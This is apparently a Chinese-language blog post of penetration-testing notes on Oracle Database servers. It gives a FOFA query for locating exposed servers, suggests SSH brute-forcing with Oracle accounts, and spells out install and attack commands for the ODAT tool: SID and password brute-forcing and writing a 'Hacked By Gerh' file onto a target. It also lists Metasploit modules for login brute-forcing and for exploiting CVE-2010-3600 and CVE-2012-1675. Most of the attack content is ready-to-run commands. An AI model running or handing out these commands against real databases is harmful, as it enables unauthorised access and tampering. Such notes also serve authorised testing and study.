Oracle 学习笔记

Oracle

Oracle Database Server 是美国甲骨文(Oracle)公司的一套关系数据库管理系统。该数据库管理系统提供数据管理、分布式处理等功能。

fofa : app="Oracle-数据库"

版本号

  • oracle 版本号是真的乱,Oracle 数据库版本号请看维基百科 Oracle Database

注入

Tips

  • scott 用户默认没有启用
  • 可以用 oracle 的账号试试 ssh 的爆破

相关文章

相关渗透工具

  • jas502n/oracleShell - oracle 数据库命令执行工具,支持连接的 Oracle 版本较低
  • quentinhardy/odat - Oracle 数据库攻击工具,支持功能包括爆破 SID,提权,命令执行
# 安装
apt install -y libaio1 alien
apt install -y python3-scapy
pip3 install colorlog termcolor pycrypto passlib cx_Oracle pyinstaller
pip3 install argcomplete && activate-global-python-argcomplete
git clone https://github.com/quentinhardy/odat.git

# 访问 https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html 下载 rpm 包
alien --to-deb oracle-instantclient19.6-basic-19.6.0.0.0-1.x86_64.rpm
dpkg -i oracle-instantclient19.6-basic_19.6.0.0.0-2_amd64.deb
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH

sudo -s
sources /etc/profile
python3 -c 'import cx_Oracle'
python3 odat.py -h
python3 odat.py all -s 192.168.1.254 -p 1521
python3 odat.py all -s 192.168.1.254 -p 1521 -d ORA19C -U system -P Test1234

# 信息收集
python3 odat.py tnscmd -s 192.168.1.254 -p 1521 --ping
python3 odat.py tnscmd -s 192.168.1.254 -p 1521 --version
python3 odat.py tnscmd -s 192.168.1.254 -p 1521 --status

# 写文件
echo "Hacked By Gerh" > /tmp/File-Test.txt
python3 odat.py dbmsxslprocessor -s 192.168.1.254 -p 1521 -d ORA19C -U system -P Test1234 --putFile "/tmp" "File-Test.txt" "/tmp/File-Test.txt"

MSF 爆破

use admin/oracle/oracle_login
set RHOSTS [IP]
set SID [SID]
run

CVE-2010-3600 Oracle Enterprise Manager Grid Control JSP 代码执行漏洞

  • 漏洞描述

Oracle Database Server 11.1.0.7 和 11.2.0.1 版本,以及 Enterprise Manager Grid Control 10.2.0.5 版本的 Client System Analyzer 组件中存在未明漏洞。远程攻击者可借助未知向量影响机密性、完整性和可用性。

  • 影响版本

  • Oracle:Enterprise_manager_grid_control:10.2.0.5:::

  • Oracle:Database_server:11.1.0.7:::

  • Oracle:Database_server:11.2.0.1:::

  • MSF 模块

use exploit/windows/oracle/client_system_analyzer_upload

CVE-2012-1675 Oracle TNS Listener Remote Poisoning

  • 漏洞描述

Oracle Database Server 在实现上存在可允许攻击者向远程“TNS Listener”组件处理的数据投毒的漏洞。攻击者可利用此漏洞将数据库服务器的合法“TNS Listener”组件中的数据转向到攻击者控制的系统,导致控制远程组件的数据库实例,造成组件和合法数据库之间的攻击者攻击、会话劫持或拒绝服务攻击。

use auxiliary/admin/oracle/tnscmd # 该漏洞可以远程获取到 oracle 的内存信息,若是能获取到内存中的数据即为存在漏洞.
set rhosts [ip]
run

use auxiliary/admin/oracle/sid_brute # 爆破 oracle 的 SID
set rhosts [ip]
run

点击关注,共同学习!安全狗的自我修养

github haidragon

https://github.com/haidragon

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C-haidragon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值